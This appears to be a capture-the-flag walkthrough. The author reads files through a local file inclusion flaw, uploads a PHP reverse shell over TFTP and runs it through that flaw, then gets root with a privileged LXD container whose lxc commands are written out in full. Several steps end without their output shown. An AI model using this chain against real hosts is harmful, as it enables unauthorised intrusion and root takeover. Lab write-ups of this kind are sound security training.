After going to http site, user is being redirected to:
So I decided to try /etc/passwd
There are users related to tftp service and web server. Meantime I finished quick scan of UDP ports:
Script scan of tftp:
I decided to enumerate host files by LFI. It is an apache web server, so tried to find some files inside /var/www/html
It looks like credentials to mike account. SSH is disabled on host. TFTP doesn’t require user and password. After 5 minutes I figured out that if it is a php server and I can execute LFI and TFTP port is open -> I can send malicious php file and execute it. I need to know the destination location of file uploaded by tftp.
Default directory of tftp is:
/var/lib/tftpboot/
I got the reverse shell:
Enumeration of Mike’s account
This is a VM without internet connection, so I need to prepare files on my machine.
One method is described on hacktricks:
2nd method is much faster in building image:
On my host:
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
Send file to victim:
On the victim:
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
filesystem is mounted at /mnt/root, so root directory is located at: /mnt/root/root
